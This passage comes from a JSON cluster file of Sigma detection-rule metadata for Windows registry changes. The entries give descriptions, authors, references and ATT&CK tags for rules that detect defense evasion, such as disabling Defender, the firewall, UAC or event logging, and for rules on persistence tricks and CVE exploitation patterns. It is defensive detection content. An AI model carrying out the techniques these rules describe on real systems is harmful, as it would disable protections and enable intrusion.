"277dc340-0540-42e7-8efb-5ff460045e07", - "value": "Service Binary in Uncommon Folder" - }, - { - "description": "Detects the abuse of custom file open handler, executing powershell", - "meta": { - "author": "CD_R0M_", - "creation_date": "2022/06/11", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_custom_file_open_handler_powershell_execution.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://news.sophos.com/en-us/2022/02/01/solarmarker-campaign-used-novel-registry-changes-to-establish-persistence/?cmp=30728", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_custom_file_open_handler_powershell_execution.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1202" - ] - }, - "uuid": "7530b96f-ad8e-431d-a04d-ac85cc461fdc", - "value": "Custom File Open Handler Executes PowerShell" - }, - { - "description": "Detects a new and suspicious printer port creation in Registry that could be an attempt to exploit CVE-2020-1048", - "meta": { - "author": "EagleEye Team, Florian Roth, NVISO", - "creation_date": "2020/05/13", - "falsepositive": [ - "New printer port install on host" - ], - "filename": "registry_set_cve_2020_1048_new_printer_port.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://windows-internals.com/printdemon-cve-2020-1048/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_cve_2020_1048_new_printer_port.yml" - ], - "tags": [ - "attack.persistence", - "attack.execution", - "attack.defense_evasion", - "attack.t1112" - ] - }, - "uuid": "7ec912f2-5175-4868-b811-ec13ad0f8567", - "value": "Suspicious New Printer Ports in Registry (CVE-2020-1048)" - }, - { - "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat 
group Sourgum", - "meta": { - "author": "Sittikorn S, frack113", - "creation_date": "2021/07/16", - "falsepositive": [ - "Unlikely" - ], - "filename": "registry_set_cve_2021_31979_cve_2021_33771_exploits.yml", - "level": "critical", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/", - "https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_cve_2021_31979_cve_2021_33771_exploits.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1566", - "attack.t1203", - "cve.2021.33771", - "cve.2021.31979" - ] - }, - "uuid": "32b5db62-cb5f-4266-9639-0fa48376ac00", - "value": "CVE-2021-31979 CVE-2021-33771 Exploits" - }, - { - "description": "Detects set value ms-msdt MSProtocol URI scheme in Registry that could be an attempt to exploit CVE-2022-30190.", - "meta": { - "author": "Sittikorn S", - "creation_date": "2020/05/31", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_cve_2022_30190_msdt_follina.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190", - "https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_cve_2022_30190_msdt_follina.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1221" - ] - }, - "uuid": "2d9403d5-7927-46b7-8216-37ab7c9ec5e3", - "value": "Suspicious Set Value of MSDT in Registry (CVE-2022-30190)" - }, - { - "description": "Detects when an attacker adds a new \"Debugger\" value to the 
\"DbgManagedDebugger\" key in order to achieve persistence which will get invoked when an application crashes", - "meta": { - "author": "frack113", - "creation_date": "2022/08/07", - "falsepositive": [ - "Legitimate use of the key to setup a debugger. Which is often the case on developers machines" - ], - "filename": "registry_set_dbgmanageddebugger_persistence.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/", - "https://github.com/last-byte/PersistenceSniper", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dbgmanageddebugger_persistence.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1574" - ] - }, - "uuid": "9827ae57-3802-418f-994b-d5ecf5cd974b", - "value": "Add Debugger Entry To DbgManagedDebugger For Persistence" - }, - { - "description": "Detects the Setting of Windows Defender Exclusions", - "meta": { - "author": "Christian Burkard", - "creation_date": "2021/07/06", - "falsepositive": [ - "Administrator actions" - ], - "filename": "registry_set_defender_exclusions.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/_nullbind/status/1204923340810543109", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_defender_exclusions.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "a982fc9c-6333-4ffb-a51d-addb04e8b529", - "value": "Windows Defender Exclusions Added - Registry" - }, - { - "description": "Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)", - "meta": { - "author": "Dimitrios Slamaris", - "creation_date": "2017/05/15", - "falsepositive": [ - "Unknown" - ], - 
"filename": "registry_set_dhcp_calloutdll.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html", - "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", - "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dhcp_calloutdll.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.t1112" - ] - }, - "uuid": "9d3436ef-9476-4c43-acca-90ce06bdf33a", - "value": "DHCP Callout DLL Installation" - }, - { - "description": "Detects disabling Windows Defender Exploit Guard Network Protection", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/04", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://www.tenforums.com/tutorials/105533-enable-disable-windows-defender-exploit-protection-settings.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "bf9e1387-b040-4393-9851-1598f8ecfae9", - "value": "Disable Exploit Guard Network Protection on Windows Defender" - }, - { - "description": "Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/07/04", - "falsepositive": [ - "Other Antivirus software installations could cause Windows to disable that eventlog (unknown)" - ], - "filename": "registry_set_disabled_microsoft_defender_eventlog.yml", - "level": "high", - 
"logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/WhichbufferArda/status/1543900539280293889/photo/2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disabled_microsoft_defender_eventlog.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "fcddca7c-b9c0-4ddf-98da-e1e2d18b0157", - "value": "Disabled Windows Defender Eventlog" - }, - { - "description": "Detects disabling Windows Defender PUA protection", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/04", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_disabled_pua_protection_on_microsoft_defender.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://www.tenforums.com/tutorials/32236-enable-disable-microsoft-defender-pua-protection-windows-10-a.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disabled_pua_protection_on_microsoft_defender.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "8ffc5407-52e3-478f-9596-0a7371eafe13", - "value": "Disable PUA Protection on Windows Defender" - }, - { - "description": "Detects disabling Windows Defender Tamper Protection", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/04", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_disabled_tamper_protection_on_microsoft_defender.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://www.tenforums.com/tutorials/123792-turn-off-tamper-protection-microsoft-defender-antivirus.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disabled_tamper_protection_on_microsoft_defender.yml" - ], - "tags": [ - 
"attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "93d298a1-d28f-47f1-a468-d971e7796679", - "value": "Disable Tamper Protection on Windows Defender" - }, - { - "description": "Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system", - "meta": { - "author": "frack113", - "creation_date": "2022/01/16", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_disable_administrative_share.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md#atomic-test-4---disable-administrative-share-creation-at-startup", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_administrative_share.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.005" - ] - }, - "uuid": "c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e", - "value": "Disable Administrative Share Creation at Startup" - }, - { - "description": "Detects tampering of autologger trace sessions which is a technique used by attackers to disable logging", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/01", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_disable_autologger_sessions.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/MichalKoczwara/status/1553634816016498688", - "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "f37b4bce-49d0-4087-9f5b-58bffda77316", - "value": 
"AutoLogger Sessions Tamper" - }, - { - "description": "Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage", - "meta": { - "author": "frack113", - "creation_date": "2022/01/09", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_disable_defender_firewall.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-2---disable-microsoft-defender-firewall-via-registry", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_defender_firewall.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.004" - ] - }, - "uuid": "974515da-6cc5-4c95-ae65-f97f9150ec7f", - "value": "Disable Microsoft Defender Firewall via Registry" - }, - { - "description": "Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique)", - "meta": { - "author": "frack113, Nasreddine Bencherchali", - "creation_date": "2022/03/18", - "falsepositive": [ - "Legitimate admin script" - ], - "filename": "registry_set_disable_function_user.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md", - "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", - "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_function_user.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ] - }, - "uuid": "e2482f8d-3443-4237-b906-cc145d87a076", - "value": "Disable Internal Tools or Feature in Registry" 
- }, - { - "description": "Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/25", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_disable_macroruntimescanscope.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://www.microsoft.com/en-us/security/blog/2018/09/12/office-vba-amsi-parting-the-veil-on-malicious-macros/", - "https://admx.help/?Category=Office2016&Policy=office16.Office.Microsoft.Policies.Windows::L_MacroRuntimeScanScope", - "https://github.com/S3cur3Th1sSh1t/OffensiveVBA/blob/28cc6a2802d8176195ac19b3c8e9a749009a82a3/src/AMSIbypasses.vba", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_macroruntimescanscope.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "ab871450-37dc-4a3a-997f-6662aa8ae0f1", - "value": "Disable Macro Runtime Scan Scope" - }, - { - "description": "Disable Microsoft Office Security Features by registry", - "meta": { - "author": "frack113", - "creation_date": "2021/06/08", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_disable_microsoft_office_security_features.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/", - "https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_microsoft_office_security_features.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": 
"7c637634-c95d-4bbf-b26c-a82510874b34", - "value": "Disable Microsoft Office Security Features" - }, - { - "description": "Detects registry modifications that disable Privacy Settings Experience", - "meta": { - "author": "frack113", - "creation_date": "2022/10/02", - "falsepositive": [ - "Legitimate admin script" - ], - "filename": "registry_set_disable_privacy_settings_experience.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1562.001/T1562.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_privacy_settings_experience.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "0372e1f9-0fd2-40f7-be1b-a7b2b848fa7b", - "value": "Disable Privacy Settings Experience in Registry" - }, - { - "description": "Detect set UseActionCenterExperience to 0 to disable the windows security center notification", - "meta": { - "author": "frack113", - "creation_date": "2022/08/19", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_disable_security_center_notifications.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_security_center_notifications.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ] - }, - "uuid": "3ae1a046-f7db-439d-b7ce-b8b366b81fa6", - "value": "Disable Windows Security Center Notifications" - }, - { - "description": "Detects the modification of the registry to disable a system restore on the computer", - "meta": { - "author": "frack113", - "creation_date": "2022/04/04", - 
"falsepositive": [ - "Unknown" - ], - "filename": "registry_set_disable_system_restore.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-9---disable-system-restore-through-registry", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_system_restore.yml" - ], - "tags": [ - "attack.impact", - "attack.t1490" - ] - }, - "uuid": "5de03871-5d46-4539-a82d-3aa992a69a83", - "value": "Registry Disable System Restore" - }, - { - "description": "Detects when an attacker tries to disable User Account Control (UAC) by changing its registry key HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA from 1 to 0", - "meta": { - "author": "frack113", - "creation_date": "2022/01/05", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_disable_uac_registry.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-8---disable-uac-using-regexe", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_uac_registry.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" - ] - }, - "uuid": "48437c39-9e5f-47fb-af95-3d663c3f2919", - "value": "Disable UAC Using Registry" - }, - { - "description": "Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry", - "meta": { - "author": "Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali", - "creation_date": "2022/08/01", - "falsepositive": [ - "Administrator actions" - ], - "filename": 
"registry_set_disable_windows_defender_service.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", - "https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_windows_defender_service.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "e1aa95de-610a-427d-b9e7-9b46cfafbe6a", - "value": "Windows Defender Service Disabled" - }, - { - "description": "Detect set EnableFirewall to 0 to disable the windows firewall", - "meta": { - "author": "frack113", - "creation_date": "2022/08/19", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_disable_windows_firewall.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.004/T1562.004.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_windows_firewall.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.004" - ] - }, - "uuid": "e78c408a-e2ea-43cd-b5ea-51975cf358c0", - "value": "Disable Windows Firewall by Registry" - }, - { - "description": "Detects tampering with the \"Enabled\" registry key in order to disable windows logging of a windows event channel", - "meta": { - "author": "frack113, Nasreddine Bencherchali", - "creation_date": "2022/07/04", - "falsepositive": [ - "Legitimate administrators disabling specific event log for troubleshooting" - ], - "filename": "registry_set_disable_winevt_logging.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/WhichbufferArda/status/1543900539280293889", - 
"https://github.com/DebugPrivilege/CPP/blob/c39d365617dbfbcb01fffad200d52b6239b2918c/Windows%20Defender/RestoreDefenderConfig.cpp", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.002" - ] - }, - "uuid": "2f78da12-f7c7-430b-8b19-a28f269b77a3", - "value": "Disable Winevt Event Logging Via Registry" - }, - { - "description": "Detect set DisallowRun to 1 to prevent user running specific computer program", - "meta": { - "author": "frack113", - "creation_date": "2022/08/19", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_disallowrun_execution.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disallowrun_execution.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ] - }, - "uuid": "275641a5-a492-45e2-a817-7c81e9d9d3e9", - "value": "Add DisallowRun Execution to Registry" - }, - { - "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun.\nThe disk cleanup manager is part of the operating system.\nIt displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and 
registering a disk cleanup handler.\n", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/21", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_disk_cleanup_handler_autorun_persistence.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://persistence-info.github.io/Data/diskcleanuphandler.html", - "https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disk_cleanup_handler_autorun_persistence.yml" - ], - "tags": [ - "attack.persistence" - ] - }, - "uuid": "d4e2745c-f0c6-4bde-a3ab-b553b3f693cc", - "value": "Persistence Via Disk Cleanup Handler - Autorun" - }, - { - "description": "Detects when a user enables DNS-over-HTTPS.\nThis can be used to hide internet activity or be used to hide the process of exfiltrating data.\nWith this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors.\n", - "meta": { - "author": "Austin Songer", - "creation_date": "2021/07/22", - "falsepositive": [ - "Unlikely" - ], - "filename": "registry_set_dns_over_https_enabled.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html", - "https://github.com/elastic/detection-rules/issues/1371", - "https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode", - "https://admx.help/HKLM/Software/Policies/Mozilla/Firefox/DNSOverHTTPS", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dns_over_https_enabled.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1140", - "attack.t1112" - ] - }, - "uuid": "04b45a8a-d11d-49e4-9acc-4a1b524407a5", - "value": "DNS-over-HTTPS 
Enabled by Registry" - }, - { - "description": "Detects the installation of a plugin DLL via ServerLevelPluginDll parameter in Registry, which can be used to execute code in context of the DNS server (restart required)", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/05/08", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_dns_serverlevelplugindll.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dns_serverlevelplugindll.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.t1112" - ] - }, - "uuid": "e61e8a88-59a9-451c-874e-70fcc9740d67", - "value": "DNS ServerLevelPluginDll Install - Registry" - }, - { - "description": "This rule detects cor_enable_profiling and cor_profiler environment variables being set and configured.", - "meta": { - "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", - "creation_date": "2020/09/10", - "falsepositive": "No established falsepositives", - "filename": "registry_set_enabling_cor_profiler_env_variables.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/jamieantisocial/status/1304520651248668673", - "https://www.slideshare.net/JamieWilliams130/started-from-the-bottom-exploiting-data-sources-to-uncover-attck-behaviors", - "https://www.sans.org/cyber-security-summit/archives", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_enabling_cor_profiler_env_variables.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1574.012" - ] - }, - "uuid": "ad89044a-8f49-4673-9a55-cbd88a1b374f", - "value": "Enabling COR 
Profiler Environment Variables" - }, - { - "description": "Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability", - "meta": { - "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", - "creation_date": "2022/06/15", - "falsepositive": [ - "Administrator actions" - ], - "filename": "registry_set_enabling_turnoffcheck.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/wdormann/status/1537075968568877057?s=20&t=0lr18OAnmAGoGpma6grLUw", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_enabling_turnoffcheck.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "7d995e63-ec83-4aa3-89d5-8a17b5c87c86", - "value": "Scripted Diagnostics Turn Off Check Enabled - Registry" - }, - { - "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2020/06/05", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_etw_disabled.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/_xpn_/status/1268712093928378368", - "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", - "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", - "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", - "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", - 
"https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", - "https://bunnyinside.com/?term=f71e8cb9c76a", - "http://managed670.rssing.com/chan-5590147/all_p1.html", - "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_etw_disabled.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ] - }, - "uuid": "bf4fc428-dcc3-4bbd-99fe-2422aeee2544", - "value": "COMPlus_ETWEnabled Registry Modification - Registry" - }, - { - "description": "Detects applications being added to the \"allowed applications\" list of exploit guard in order to bypass controlled folder settings", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/05", - "falsepositive": [ - "Unlikely" - ], - "filename": "registry_set_exploit_guard_susp_allowed_apps.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://www.microsoft.com/security/blog/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_exploit_guard_susp_allowed_apps.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "42205c73-75c8-4a63-9db1-e3782e06fda0", - "value": "Suspicious Application Allowed Through Exploit Guard" - }, - { - "description": "Detect change of the user account associated with the FAX service to avoid the escalation problem.", - "meta": { - "author": "frack113", - "creation_date": "2022/07/17", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_fax_change_service_user.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - 
"https://twitter.com/dottor_morte/status/1544652325570191361",
- "https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_fax_change_service_user.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1112"
- ]
- },
- "uuid": "e3fdf743-f05b-4051-990a-b66919be1743",
- "value": "Change User Account Associated with the FAX Service"
- },
- {
- "description": "Detect possible persistence using Fax DLL load when service restart",
- "meta": {
- "author": "frack113",
- "creation_date": "2022/07/17",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "registry_set_fax_dll_persistance.yml",
- "level": "high",
- "logsource.category": "registry_set",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/dottor_morte/status/1544652325570191361",
- "https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_fax_dll_persistance.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1112"
- ]
- },
- "uuid": "9e3357ba-09d4-4fbd-a7c5-ad6386314513",
- "value": "Change the Fax Dll"
- },
- {
- "description": "Detects the abuse of the exefile handler in new file association. 
Used for bypass of security products.",
- "meta": {
